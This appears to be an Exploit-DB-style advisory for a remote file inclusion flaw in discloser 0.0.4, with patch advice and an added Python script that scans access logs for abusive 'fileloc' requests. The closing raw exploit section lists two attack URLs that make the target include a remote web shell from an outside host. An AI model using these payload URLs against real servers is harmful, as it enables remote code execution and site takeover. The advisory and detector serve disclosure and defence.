Vendor: discloser
By: Arash RJ
CVSS: 7,5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: discloser
Affected Version From: 0.0.4
Affected Version To: 0.0.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:discloser:discloser:0.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

discloser 0.0.4 Remote File Inclusion Vulnerability

A Remote File Inclusion (RFI) vulnerability exists in discloser 0.0.4. An attacker can exploit it to make the application include a remote file, such as a malicious PHP script, and execute it on the vulnerable system. The vulnerable parameter is 'fileloc' in the 'content/content.php' and 'inc/indexhead.php' scripts.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to discloser 0.0.5 or later.
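
To check whether a host that ran 0.0.4 received requests of this kind, the following added example (not part of the original advisory or of the discloser project) scans web server access logs for requests to the two named scripts where 'fileloc' carries a remote location. The combined log format, the sample log lines and the host names in them are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameter named in the advisory.
VULN_SCRIPTS = ("/content/content.php", "/inc/indexhead.php")
PARAM = "fileloc"

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that names a remote resource: scheme://... or protocol-relative //host.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)


def remote_fileloc(request_target):
    """Return the decoded fileloc value if it points at a remote resource, else None."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith(VULN_SCRIPTS):
        return None
    # parse_qs percent-decodes values, so encoded schemes (http%3A%2F%2F) are caught too.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if REMOTE_RE.match(value):
            return value
    return None


def scan(lines):
    """Yield (line_number, client_ip, fileloc_value) for each suspicious request."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = remote_fileloc(match.group(1))
        if value is not None:
            yield number, line.split(" ", 1)[0], value


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Aug/2006:10:00:01 +0000] "GET /discloser/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Aug/2006:10:00:05 +0000] "GET /discloser/content/content.php?fileloc=http://host.example/x.txt? HTTP/1.1" 200 312',
    '192.0.2.10 - - [15/Aug/2006:10:00:09 +0000] "GET /discloser/content/content.php?fileloc=pages/about.php HTTP/1.1" 200 2048',
    '198.51.100.7 - - [15/Aug/2006:10:00:12 +0000] "GET /discloser/inc/indexhead.php?fileloc=HTTP%3A%2F%2Fhost.example%2Fx.txt HTTP/1.1" 200 298',
]

if __name__ == "__main__":
    for number, client, value in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent fileloc={value!r}")
```

A hit shows that a request was made, not that the include succeeded; correlate with outbound connections from the web server at the same timestamps.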

Exploit-DB raw data:

|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| discloser 0.0.4 Remote File Inclusion Vulnerability
|
| Download: http://optusnet.dl.sourceforge.net/sourceforge/discloser/discloser-0.0.4.tar.gz
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|Contact|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| Discovered by: Arash RJ
|
| Team: PersianFox Digital Security Team
|
| URL: http://www.PersianFox.com
|
| E-Mail: arashrj@gmail.com
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|Exploit|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| http://[Target]/[Path]/content/content.php?fileloc=http://www.evalsite.com/shell.php?
|
| http://[Target]/[Path]/inc/indexhead.php?fileloc= http://www.evalsite.com/shell.php?
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|

# milw0rm.com [2006-08-15]